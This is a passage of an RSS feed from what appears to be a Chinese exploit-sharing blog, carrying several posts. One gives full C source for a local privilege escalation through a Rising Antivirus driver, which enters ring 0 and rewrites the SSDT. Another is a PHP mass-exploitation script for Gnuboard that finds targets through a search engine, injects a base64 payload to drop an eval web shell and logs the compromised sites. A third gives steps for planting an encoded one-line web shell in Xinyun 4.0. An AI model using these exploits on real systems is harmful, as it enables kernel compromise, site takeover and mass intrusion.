		<description><![CDATA[编译后,运行此程序,可在ring3下直接恢复其ssdt,然后就可以为所欲为了,刚才测试1月28日对瑞星2010版有效,据说也适用于2009和 2008版本 //MY Blog:http://hi.baidu.com/9908006 //MY QQ:165659238 //VC-ConsoleWithApi #include "stdafx.h" #include "windows.h" enum { SystemModuleInformation = 11 }; typedef struct { ULONG Unknown1; ULONG Unknown2; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT NameLength; USHORT LoadCount; USHORT PathLength; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; typedef struct { ULONG Count; SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; HANDLE g_RsGdiHandle [...]]]></description>
			<content:encoded><![CDATA[<p>编译后,运行此程序,可在ring3下直接恢复其ssdt,然后就可以为所欲为了,刚才测试1月28日对瑞星2010版有效,据说也适用于2009和 2008版本</p>
<blockquote><p>
//MY Blog:http://hi.baidu.com/9908006</p>
<p>//MY QQ:165659238</p>
<p>//VC-ConsoleWithApi</p>
<p>#include "stdafx.h"</p>
<p>#include "windows.h"</p>
<p>enum { SystemModuleInformation = 11 };</p>
<p>typedef struct {</p>
<p>ULONG Unknown1;</p>
<p>ULONG Unknown2;</p>
<p>PVOID Base;</p>
<p>ULONG Size;</p>
<p>ULONG Flags;</p>
<p>USHORT Index;</p>
<p>USHORT NameLength;</p>
<p>USHORT LoadCount;</p>
<p>USHORT PathLength;</p>
<p>CHAR ImageName[256];</p>
<p>} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;</p>
<p>typedef struct {</p>
<p>ULONG Count;</p>
<p>SYSTEM_MODULE_INFORMATION_ENTRY Module[1];</p>
<p>} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;</p>
<p>HANDLE g_RsGdiHandle = 0 ;</p>
<p>void __stdcall WriteKVM(PVOID Address , ULONG Value)</p>
<p>{</p>
<p>ULONG ColorValue = Value ;</p>
<p>ULONG btr ;</p>
<p>ULONG ColorBuffer = 0 ;</p>
<p>DeviceIoControl(g_RsGdiHandle ,</p>
<p>0x83003C0B,</p>
<p>&amp;ColorValue ,</p>
<p>sizeof(ULONG),</p>
<p>&amp;ColorBuffer ,</p>
<p>sizeof(ULONG),</p>
<p>&amp;btr ,</p>
<p>0</p>
<p>);</p>
<p>DeviceIoControl(g_RsGdiHandle ,</p>
<p>0x83003C0B,</p>
<p>&amp;ColorValue ,</p>
<p>sizeof(ULONG),</p>
<p>Address ,</p>
<p>sizeof(ULONG),</p>
<p>&amp;btr ,</p>
<p>0</p>
<p>);</p>
<p>return ;</p>
<p>}</p>
<p>void AddCallGate()</p>
<p>{</p>
<p>ULONG Gdt_Addr;</p>
<p>ULONG CallGateData[0x4];</p>
<p>ULONG Icount;</p>
<p>__asm</p>
<p>{</p>
<p>push edx</p>
<p>sgdt [esp-2]</p>
<p>pop edx</p>
<p>mov Gdt_Addr , edx</p>
<p>}</p>
<p>__asm</p>
<p>{</p>
<p>push 0xc3</p>
<p>push Gdt_Addr</p>
<p>call WriteKVM</p>
<p>mov eax,Gdt_Addr</p>
<p>mov word ptr[CallGateData],ax</p>
<p>shr eax,16</p>
<p>mov word ptr[CallGateData+6],ax</p>
<p>mov dword ptr[CallGateData+2],0x0ec0003e8</p>
<p>mov dword ptr[CallGateData+8],0x0000ffff</p>
<p>mov dword ptr[CallGateData+12],0x00cf9a00</p>
<p>xor eax,eax</p>
<p>LoopWrite:</p>
<p>mov edi,dword ptr CallGateData[eax]</p>
<p>push edi</p>
<p>mov edi,Gdt_Addr</p>
<p>add edi,0x3e0</p>
<p>add edi,eax</p>
<p>push edi</p>
<p>mov Icount,eax</p>
<p>call WriteKVM</p>
<p>mov eax,Icount</p>
<p>add eax , 0x4</p>
<p>cmp eax,0x10</p>
<p>jnz LoopWrite</p>
<p>}</p>
<p>return ;</p>
<p>}</p>
<p>void IntoR0(PVOID function)</p>
<p>{</p>
<p>WORD Callgt[3];</p>
<p>Callgt[0] = 0;</p>
<p>Callgt[1] = 0;</p>
<p>Callgt[2] = 0x3e3;</p>
<p>__asm</p>
<p>{</p>
<p>call fword ptr[Callgt]</p>
<p>mov eax,esp</p>
<p>mov esp,[esp+4]</p>
<p>push eax</p>
<p>call function</p>
<p>pop esp</p>
<p>push offset ring3Ret</p>
<p>retf</p>
<p>ring3Ret:</p>
<p>nop</p>
<p>}</p>
<p>return ;</p>
<p>}</p>
<p>#pragma pack(1)</p>
<p>typedef struct _IDTR</p>
<p>{</p>
<p>SHORT IDTLimit;</p>
<p>UINT IDTBase;</p>
<p>}IDTR,</p>
<p>*PIDTR,</p>
<p>**PPIDTR;</p>
<p>#pragma pack()</p>
<p>ULONG g_RealSSDT = 0 ;</p>
<p>ULONG ServiceNum = 0 ;</p>
<p>ULONG OrgService [0x1000] ;</p>
<p>ULONG RvaToOffset(IMAGE_NT_HEADERS *NT, ULONG Rva)</p>
<p>{</p>
<p>ULONG Offset = Rva, Limit;</p>
<p>IMAGE_SECTION_HEADER *Img;</p>
<p>WORD i;</p>
<p>Img = IMAGE_FIRST_SECTION(NT);</p>
<p>if (Rva &lt; Img-&gt;PointerToRawData)</p>
<p>return Rva;</p>
<p>for (i = 0; i &lt; NT-&gt;FileHeader.NumberOfSections; i++)</p>
<p>{</p>
<p>if (Img.SizeOfRawData)</p>
<p>Limit = Img.SizeOfRawData;</p>
<p>else</p>
<p>Limit = Img.Misc.VirtualSize;</p>
<p>if (Rva &gt;= Img.VirtualAddress &amp;&amp;</p>
<p>Rva &lt; (Img.VirtualAddress + Limit))</p>
<p>{</p>
<p>if (Img.PointerToRawData != 0)</p>
<p>{</p>
<p>Offset -= Img.VirtualAddress;</p>
<p>Offset += Img.PointerToRawData;</p>
<p>}</p>
<p>return Offset;</p>
<p>}</p>
<p>}</p>
<p>return 0;</p>
<p>}</p>
<p>#define ibaseDD *(PDWORD)&amp;ibase</p>
<p>DWORD GetHeaders(PCHAR ibase, PIMAGE_FILE_HEADER *pfh, PIMAGE_OPTIONAL_HEADER *poh, PIMAGE_SECTION_HEADER *psh)</p>
<p>{</p>
<p>PIMAGE_DOS_HEADER mzhead=(PIMAGE_DOS_HEADER)ibase;</p>
<p>if ((mzhead-&gt;e_magic!=IMAGE_DOS_SIGNATURE)||(ibaseDD[mzhead-&gt;e_lfanew]!=IMAGE_NT_SIGNATURE)) return FALSE;</p>
<p>*pfh=(PIMAGE_FILE_HEADER)&amp;ibase[mzhead-&gt;e_lfanew];</p>
<p>if (((PIMAGE_NT_HEADERS)*pfh)-&gt;Signature!=IMAGE_NT_SIGNATURE) return FALSE;</p>
<p>*pfh=(PIMAGE_FILE_HEADER)((PBYTE)*pfh+sizeof(IMAGE_NT_SIGNATURE));</p>
<p>*poh=(PIMAGE_OPTIONAL_HEADER)((PBYTE)*pfh+sizeof(IMAGE_FILE_HEADER));</p>
<p>if ((*poh)-&gt;Magic!=IMAGE_NT_OPTIONAL_HDR32_MAGIC) return FALSE;</p>
<p>*psh=(PIMAGE_SECTION_HEADER)((PBYTE)*poh+sizeof(IMAGE_OPTIONAL_HEADER));</p>
<p>return TRUE;</p>
<p>}</p>
<p>typedef struct {</p>
<p>WORD offset:12;</p>
<p>WORD type:4;</p>
<p>} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;</p>
<p>#define RVATOVA(base,offset) ((PVOID)((DWORD)(base)+(DWORD)(offset)))</p>
<p>DWORD FindKiServiceTable(HMODULE hModule,DWORD dwKSDT , PULONG ImageBase)</p>
<p>{</p>
<p>PIMAGE_FILE_HEADER pfh;</p>
<p>PIMAGE_OPTIONAL_HEADER poh;</p>
<p>PIMAGE_SECTION_HEADER psh;</p>
<p>PIMAGE_BASE_RELOCATION pbr;</p>
<p>PIMAGE_FIXUP_ENTRY pfe;</p>
<p>DWORD dwFixups=0,i,dwPointerRva,dwPointsToRva,dwKiServiceTable;</p>
<p>BOOL bFirstChunk;</p>
<p>GetHeaders((PCHAR)hModule,&amp;pfh,&amp;poh,&amp;psh);</p>
<p>if ((poh-&gt;DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) &amp;&amp;</p>
<p>(!((pfh-&gt;Characteristics)&amp;IMAGE_FILE_RELOCS_STRIPPED))) {</p>
<p>pbr=(PIMAGE_BASE_RELOCATION)RVATOVA(poh-&gt;DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress,hModule);</p>
<p>bFirstChunk=TRUE;</p>
<p>while (bFirstChunk || pbr-&gt;VirtualAddress) {</p>
<p>bFirstChunk=FALSE;</p>
<p>pfe=(PIMAGE_FIXUP_ENTRY)((DWORD)pbr+sizeof(IMAGE_BASE_RELOCATION));</p>
<p>for (i=0;i&lt;(pbr-&gt;SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))&gt;&gt;1;i++,pfe++) {</p>
<p>if (pfe-&gt;type==IMAGE_REL_BASED_HIGHLOW) {</p>
<p>dwFixups++;</p>
<p>dwPointerRva=pbr-&gt;VirtualAddress+pfe-&gt;offset;</p>
<p>dwPointsToRva=*(PDWORD)((DWORD)hModule+dwPointerRva)-(DWORD)poh-&gt;ImageBase;</p>
<p>if (dwPointsToRva==dwKSDT)</p>
<p>{</p>
<p>if (*(PWORD)((DWORD)hModule+dwPointerRva-2)==0x05c7)</p>
<p>{</p>
<p>dwKiServiceTable=*(PDWORD)((DWORD)hModule+dwPointerRva+4)-poh-&gt;ImageBase;</p>
<p>*ImageBase = poh-&gt;ImageBase;</p>
<p>return dwKiServiceTable;</p>
<p>}</p>
<p>}</p>
<p>}</p>
<p>}</p>
<p>*(PDWORD)&amp;pbr+=pbr-&gt;SizeOfBlock;</p>
<p>}</p>
<p>}</p>
<p>return 0;</p>
<p>}</p>
<p>DWORD CR0Reg ;</p>
<p>ULONG realssdt ;</p>
<p>void InKerneProc()</p>
<p>{</p>
<p>__asm</p>
<p>{</p>
<p>cli</p>
<p>mov eax, cr0</p>
<p>mov CR0Reg,eax</p>
<p>and eax,0xFFFEFFFF</p>
<p>mov cr0, eax</p>
<p>}</p>
<p>int i;</p>
<p>for (i = 0; i &lt; (int)ServiceNum; i++)</p>
<p>{</p>
<p>*(ULONG*)(*(ULONG*)realssdt + i * sizeof(ULONG)) = OrgService;</p>
<p>}</p>
<p>__asm</p>
<p>{</p>
<p>mov eax, CR0Reg</p>
<p>mov cr0, eax</p>
<p>sti</p>
<p>}</p>
<p>}</p>
<p>int main(int argc, char* argv[])</p>
<p>{</p>
<p>printf("Rising AntiVirus 2008 ~ 2010 n"</p>
<p>"Local Privilege Escalation Vulnerability Proof Of Concept Exploitn 2010-1-27n");</p>
<p>g_RsGdiHandle = CreateFile("[url=]\\.\RSNTGDI[/url]" ,</p>
<p>0,</p>
<p>FILE_SHARE_READ | FILE_SHARE_WRITE ,</p>
<p>0,</p>
<p>OPEN_EXISTING , 0 , 0 );</p>
<p>if (g_RsGdiHandle == INVALID_HANDLE_VALUE)</p>
<p>{</p>
<p>return 0 ;</p>
<p>}</p>
<p>SYSTEM_MODULE_INFORMATION ModuleInfo ;</p>
<p>// Learn the loaded kernel (e.g. NTKRNLPA vs NTOSKRNL), and it's base address</p>
<p>HMODULE hlib = GetModuleHandle("ntdll.dll");</p>
<p>PVOID pNtQuerySystemInformation = GetProcAddress(hlib , "NtQuerySystemInformation");</p>
<p>ULONG infosize = sizeof(ModuleInfo);</p>
<p>__asm</p>
<p>{</p>
<p>push 0</p>
<p>push infosize</p>
<p>lea eax , ModuleInfo</p>
<p>push eax</p>
<p>push 11</p>
<p>call pNtQuerySystemInformation</p>
<p>}</p>
<p>HMODULE KernelHandle ;</p>
<p>LPCSTR ntosname = (LPCSTR)((ULONG)ModuleInfo.Module[0].ImageName + ModuleInfo.Module[0].PathLength);</p>
<p>// Load the kernel image specified</p>
<p>KernelHandle = LoadLibrary(ntosname);</p>
<p>if (KernelHandle == 0 )</p>
<p>{</p>
<p>return 0 ;</p>
<p>}</p>
<p>ULONG KeSSDT = (ULONG)GetProcAddress(KernelHandle , "KeServiceDescriptorTable");</p>
<p>if (KeSSDT == 0 )</p>
<p>{</p>
<p>return 0 ;</p>
<p>}</p>
<p>ULONG ImageBase = 0 ;</p>
<p>ULONG KiSSDT = FindKiServiceTable(KernelHandle , KeSSDT - (ULONG)KernelHandle , &amp;ImageBase);</p>
<p>if (KiSSDT == 0 )</p>
<p>{</p>
<p>return 0 ;</p>
<p>}</p>
<p>KiSSDT += (ULONG)KernelHandle;</p>
<p>ServiceNum = 0x11c ;</p>
<p>ULONG i ;</p>
<p>for (i = 0 ; i &lt; ServiceNum ; i ++)</p>
<p>{</p>
<p>OrgService = *(ULONG*)(KiSSDT + i * sizeof(ULONG)) + (ULONG)ModuleInfo.Module[0].Base - ImageBase;</p>
<p>}</p>
<p>realssdt = KeSSDT - (ULONG)KernelHandle + (ULONG)ModuleInfo.Module[0].Base;</p>
<p>SetThreadAffinityMask(GetCurrentThread () , 0 ) ;</p>
<p>AddCallGate();</p>
<p>IntoR0(InKerneProc);</p>
<p>return 0;</p>
<p>}
</p></blockquote>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2010年08月26日 -- <a href="http://www.4shell.org/archives/1841.html" title="xp_hello.dll(sa) 提权">xp_hello.dll(sa) 提权</a></li><li>2010年06月10日 -- <a href="http://www.4shell.org/archives/1777.html" title="你还敢执行txt文件吗？Windows 0day ">你还敢执行txt文件吗？Windows 0day </a></li><li>2010年05月21日 -- <a href="http://www.4shell.org/archives/1761.html" title="橙色预警：PHP PATH_INFO 存在漏洞">橙色预警：PHP PATH_INFO 存在漏洞</a></li><li>2010年04月23日 -- <a href="http://www.4shell.org/archives/1723.html" title="rar.exe在提权中的妙用">rar.exe在提权中的妙用</a></li><li>2010年04月23日 -- <a href="http://www.4shell.org/archives/1722.html" title="Shopex V4.8.4 V4.8.5 0Day 通杀">Shopex V4.8.4 V4.8.5 0Day 通杀</a></li><li>2010年04月20日 -- <a href="http://www.4shell.org/archives/1718.html" title="沙盒提权的小tips">沙盒提权的小tips</a></li><li>2010年04月1日 -- <a href="http://www.4shell.org/archives/1641.html" title="PDF最新0day">PDF最新0day</a></li><li>2010年03月24日 -- <a href="http://www.4shell.org/archives/1632.html" title="Firefox 3.6 0day被补了">Firefox 3.6 0day被补了</a></li><li>2010年03月10日 -- <a href="http://www.4shell.org/archives/1615.html" title="DedeCms v5.5 0day">DedeCms v5.5 0day</a></li><li>2010年01月20日 -- <a href="http://www.4shell.org/archives/1481.html" title="IE 极光0day攻击代码已经全面泄露 WebSense发出安全警告">IE 极光0day攻击代码已经全面泄露 WebSense发出安全警告</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1548.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>IE 极光0day攻击代码已经全面泄露 WebSense发出安全警告</title>
		<link>http://www.4shell.org/archives/1481.html</link>
		<comments>http://www.4shell.org/archives/1481.html#comments</comments>
		<pubDate>Wed, 20 Jan 2010 02:11:42 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[业界资讯]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[IE]]></category>

		<guid isPermaLink="false">http://www.4shell.org/archives/1481.html</guid>
		<description><![CDATA[谷歌，Adobe和其他大公司有针对性的攻击的消息上周已经被披露，最初安全人员们预计是采用恶意的PDF文件进行攻击，但在上周四，微软承认攻击是由一个Internet Explorer中新的安全漏洞引发。 目前已经检测到针对此漏洞的攻击代码正在蔓延，相应的恶意代码页面也已经出现，安全研究机构WebSense今日发出安全警告，以下是技术分析截图： 相关文章2010年06月10日 -- 你还敢执行txt文件吗？Windows 0day 2010年05月21日 -- 橙色预警：PHP PATH_INFO 存在漏洞2010年04月23日 -- Shopex V4.8.4 V4.8.5 0Day 通杀2010年04月1日 -- PDF最新0day2010年03月24日 -- Firefox 3.6 0day被补了2010年03月10日 -- DedeCms v5.5 0day2010年01月31日 -- 瑞星本地提权通杀利用代码2009年09月22日 -- Gnuboard 0day&#038;Exp2009年09月22日 -- 新云4.0最新0day2009年09月20日 -- phpcms2008 最新0day &#038; Exp]]></description>
			<content:encoded><![CDATA[<p>谷歌，Adobe和其他大公司有针对性的攻击的消息上周已经被披露，最初安全人员们预计是采用恶意的PDF文件进行攻击，但在上周四，微软承认攻击是由一个Internet Explorer中新的安全漏洞引发。<br />
<strong>目前已经检测到针对此漏洞的攻击代码正在蔓延，相应的恶意代码页面也已经出现，安全研究机构WebSense今日发出安全警告，以下是技术分析截图：</strong></p>
<p><img src="http://www.4shell.org/wp-content/uploads/images/2010/01/10114162i.png" alt="http://www.4shell.org/wp-content/uploads/images/2010/01/10114162i.png" /><br />
<span id="more-1481"></span><br />
<img src="http://www.4shell.org/wp-content/uploads/images/2010/01/101141n3Z.jpg" alt="http://www.4shell.org/wp-content/uploads/images/2010/01/101141n3Z.jpg" /></p>
<p><img src="http://www.4shell.org/wp-content/uploads/images/2010/01/101142NJW.png" alt="http://www.4shell.org/wp-content/uploads/images/2010/01/101142NJW.png" /></p>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2010年06月10日 -- <a href="http://www.4shell.org/archives/1777.html" title="你还敢执行txt文件吗？Windows 0day ">你还敢执行txt文件吗？Windows 0day </a></li><li>2010年05月21日 -- <a href="http://www.4shell.org/archives/1761.html" title="橙色预警：PHP PATH_INFO 存在漏洞">橙色预警：PHP PATH_INFO 存在漏洞</a></li><li>2010年04月23日 -- <a href="http://www.4shell.org/archives/1722.html" title="Shopex V4.8.4 V4.8.5 0Day 通杀">Shopex V4.8.4 V4.8.5 0Day 通杀</a></li><li>2010年04月1日 -- <a href="http://www.4shell.org/archives/1641.html" title="PDF最新0day">PDF最新0day</a></li><li>2010年03月24日 -- <a href="http://www.4shell.org/archives/1632.html" title="Firefox 3.6 0day被补了">Firefox 3.6 0day被补了</a></li><li>2010年03月10日 -- <a href="http://www.4shell.org/archives/1615.html" title="DedeCms v5.5 0day">DedeCms v5.5 0day</a></li><li>2010年01月31日 -- <a href="http://www.4shell.org/archives/1548.html" title="瑞星本地提权通杀利用代码">瑞星本地提权通杀利用代码</a></li><li>2009年09月22日 -- <a href="http://www.4shell.org/archives/1117.html" title="Gnuboard 0day&#038;Exp">Gnuboard 0day&#038;Exp</a></li><li>2009年09月22日 -- <a href="http://www.4shell.org/archives/1112.html" title="新云4.0最新0day">新云4.0最新0day</a></li><li>2009年09月20日 -- <a href="http://www.4shell.org/archives/1105.html" title="phpcms2008 最新0day &#038; Exp">phpcms2008 最新0day &#038; Exp</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1481.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Gnuboard 0day&amp;Exp</title>
		<link>http://www.4shell.org/archives/1117.html</link>
		<comments>http://www.4shell.org/archives/1117.html#comments</comments>
		<pubDate>Tue, 22 Sep 2009 06:32:46 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[资源共享]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Gnuboard]]></category>

		<guid isPermaLink="false">http://www.4shell.org/archives/1117.html</guid>
		<description><![CDATA[利用代码如下： < ?php echo" +----------------------------------------------------------------+\r\n"; echo" http://www.t00ls.net\r\n"; echo" +----------------------------------------------------------------+\r\n"; for ($ii=1;$ii]]></description>
			<content:encoded><![CDATA[<p>利用代码如下：</p>
<blockquote><p>
< ?php<br />
echo"   +----------------------------------------------------------------+\r\n";<br />
echo"                   http://www.t00ls.net\r\n";<br />
echo"   +----------------------------------------------------------------+\r\n";<br />
for ($ii=1;$ii<=99;$ii++)<br />
{<br />
$c=(int)$ii*10+1;<br />
$a="web.search.naver.com";<br />
$b="/search.naver?where=webkr&#038;query=bbs/board.php&#038;xc=&#038;docid=0&#038;lang=all&#038;st=s&#038;fd=2&#038;start=".$c."&#038;display=10&#038;&qvt=0&#038;sm=tab_pge";<br />
get($a,$b);</p>
<p>}</p>
<p>function get($host,$file)<br />
{</p>
<p>            $fp = fsockopen($host, 80, $errno, $errstr, 10);<br />
            if (!$fp) {<br />
                echo "SocketError: $errstr ($errno)\n";<br />
                return false;<br />
            }<br />
            $get = "GET $file HTTP/1.1\r\n";<br />
            $get .= "Host: $host\r\n";<br />
            $get .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5\r\n";<br />
            $get .= "Referer: http://$host\r\n";<br />
            $get .= "Connection: Close\r\n";<br />
                        $get .= "Cookie: nsr_acl_nautocomplete=1; NB=GIYTSNJYHE4DKMJX; NNB=AIUHYPM7OXJUS; page_uid=fOL9uloi5UNssbPX/M8sss--100532; _naver_usersession_=SdN7qBY700kAAAKIwME\r\n\r\n";<br />
            fwrite($fp, $get);<br />
            $response=stream_get_contents($fp);<br />
            preg_match_all("(http://[-\w.]+(:\d+)?(/([\w/_.]*)?)?bbs\/board\.php)",$response,$put);<br />
            for ($i=0;$i<count($put[0]);$i++)<br />
                        {<br />
                        $a=(int)$i*3;</p>
<p>                        fuck($put[0][$a]);<br />
                        //echo count($put[0]);<br />
                        //print_r($put[0]);<br />
                        //fuck($put[0][$i]);</p>
<p>                        break;</p>
<p>                        }</p>
<p>            fclose($fp);</p>
<p>}</p>
<p>function fuck($ok)<br />
{</p>
<p>$a=preg_replace('(bbs\/board.php)','',$ok);</p>
<p>$file=$a."common.php?g4_path=/tmp%002345";<br />
$xxx=$a."common.php?g4_path=data:;base64,PD9mcHV0cyhmb3BlbignLi9kYXRhL29rLnBocCcsJ3crJyksJzw/cGhwIEBldmFsKCRfUE9TVFtjXSk7ZWNobyAiZnVja3lvdSI7Pz4nKTs/Pg==";<br />
$shell=$a."data/ok.php";<br />
$target=parse_url($ok);<br />
$sitepath=$target['host'];<br />
$xx=@file_get_contents($file);<br />
if(eregi("(Warning)",$xx)&#038;&eregi("(tmp)",$xx))<br />
{<br />
print $sitepath."     Vulnerability yes"."\r\n";<br />
@file_get_contents($xxx);<br />
$oksehll=@file_get_contents($shell);<br />
if(!eregi("(\\02345)",$xx))<br />
{<br />
print $sitepath."    %00 ok"."\r\n";<br />
}</p>
<p>if (eregi("(fuckyou)",$oksehll))<br />
{</p>
<p>print $shell." pass:c"."\r\n";<br />
$axx="\r\n".$shell;<br />
$sh=fopen('gnuboard.txt',"a+");<br />
fwrite($sh,$axx);<br />
fclose($sh);</p>
<p>}</p>
<p>}<br />
else<br />
{</p>
<p>print $sitepath."     Vulnerability no"."\r\n";</p>
<p>}</p>
<p>}</p>
<p>?>
</p></blockquote>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2009年09月2日 -- <a href="http://www.4shell.org/archives/1082.html" title="Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4)">Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4)</a></li><li>2011年05月16日 -- <a href="http://www.4shell.org/archives/1930.html" title="kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images">kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images</a></li><li>2010年12月16日 -- <a href="http://www.4shell.org/archives/1857.html" title="Exploits Linux Kernel <= 2.6.37 local privilege escalation">Exploits Linux Kernel <= 2.6.37 local privilege escalation</a></li><li>2010年08月26日 -- <a href="http://www.4shell.org/archives/1842.html" title="PuTTY 0.60 DLL Hijacking Exploit (winmm.dll)">PuTTY 0.60 DLL Hijacking Exploit (winmm.dll)</a></li><li>2010年06月10日 -- <a href="http://www.4shell.org/archives/1777.html" title="你还敢执行txt文件吗？Windows 0day ">你还敢执行txt文件吗？Windows 0day </a></li><li>2010年05月21日 -- <a href="http://www.4shell.org/archives/1761.html" title="橙色预警：PHP PATH_INFO 存在漏洞">橙色预警：PHP PATH_INFO 存在漏洞</a></li><li>2010年05月8日 -- <a href="http://www.4shell.org/archives/1754.html" title="PhpCms 2008 Sp3 Blind SQL Injection Exploit(2)">PhpCms 2008 Sp3 Blind SQL Injection Exploit(2)</a></li><li>2010年05月8日 -- <a href="http://www.4shell.org/archives/1753.html" title="PhpCms 2008 Sp3 Blind SQL Injection Exploit(1)">PhpCms 2008 Sp3 Blind SQL Injection Exploit(1)</a></li><li>2010年04月23日 -- <a href="http://www.4shell.org/archives/1722.html" title="Shopex V4.8.4 V4.8.5 0Day 通杀">Shopex V4.8.4 V4.8.5 0Day 通杀</a></li><li>2010年04月15日 -- <a href="http://www.4shell.org/archives/1692.html" title="Remote Exploit Against the Aircrack-NG Tools svn r1675">Remote Exploit Against the Aircrack-NG Tools svn r1675</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1117.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>新云4.0最新0day</title>
		<link>http://www.4shell.org/archives/1112.html</link>
		<comments>http://www.4shell.org/archives/1112.html#comments</comments>
		<pubDate>Tue, 22 Sep 2009 06:17:32 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[新云]]></category>

		<guid isPermaLink="false">http://www.4shell.org/archives/1112.html</guid>
		<description><![CDATA[在密码问题的地方插入加密后的一句话:┼攠數畣整爠煥敵瑳∨≡┩愾 注册成功后连接默认数据库:ask/data/ask_newasp.asa 密码:a 相关文章2010年06月10日 -- 你还敢执行txt文件吗？Windows 0day 2010年05月21日 -- 橙色预警：PHP PATH_INFO 存在漏洞2010年04月23日 -- Shopex V4.8.4 V4.8.5 0Day 通杀2010年04月1日 -- PDF最新0day2010年03月24日 -- Firefox 3.6 0day被补了2010年03月10日 -- DedeCms v5.5 0day2010年01月31日 -- 瑞星本地提权通杀利用代码2010年01月20日 -- IE 极光0day攻击代码已经全面泄露 WebSense发出安全警告2009年09月22日 -- Gnuboard 0day&#038;Exp2009年09月20日 -- phpcms2008 最新0day &#038; Exp]]></description>
			<content:encoded><![CDATA[<p>在密码问题的地方插入加密后的一句话:┼攠數畣整爠煥敵瑳∨≡┩愾<br />
注册成功后连接默认数据库:ask/data/ask_newasp.asa 密码:a</p>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2010年06月10日 -- <a href="http://www.4shell.org/archives/1777.html" title="你还敢执行txt文件吗？Windows 0day ">你还敢执行txt文件吗？Windows 0day </a></li><li>2010年05月21日 -- <a href="http://www.4shell.org/archives/1761.html" title="橙色预警：PHP PATH_INFO 存在漏洞">橙色预警：PHP PATH_INFO 存在漏洞</a></li><li>2010年04月23日 -- <a href="http://www.4shell.org/archives/1722.html" title="Shopex V4.8.4 V4.8.5 0Day 通杀">Shopex V4.8.4 V4.8.5 0Day 通杀</a></li><li>2010年04月1日 -- <a href="http://www.4shell.org/archives/1641.html" title="PDF最新0day">PDF最新0day</a></li><li>2010年03月24日 -- <a href="http://www.4shell.org/archives/1632.html" title="Firefox 3.6 0day被补了">Firefox 3.6 0day被补了</a></li><li>2010年03月10日 -- <a href="http://www.4shell.org/archives/1615.html" title="DedeCms v5.5 0day">DedeCms v5.5 0day</a></li><li>2010年01月31日 -- <a href="http://www.4shell.org/archives/1548.html" title="瑞星本地提权通杀利用代码">瑞星本地提权通杀利用代码</a></li><li>2010年01月20日 -- <a href="http://www.4shell.org/archives/1481.html" title="IE 极光0day攻击代码已经全面泄露 WebSense发出安全警告">IE 极光0day攻击代码已经全面泄露 WebSense发出安全警告</a></li><li>2009年09月22日 -- <a href="http://www.4shell.org/archives/1117.html" title="Gnuboard 0day&#038;Exp">Gnuboard 0day&#038;Exp</a></li><li>2009年09月20日 -- <a href="http://www.4shell.org/archives/1105.html" title="phpcms2008 最新0day &#038; Exp">phpcms2008 最新0day &#038; Exp</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1112.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

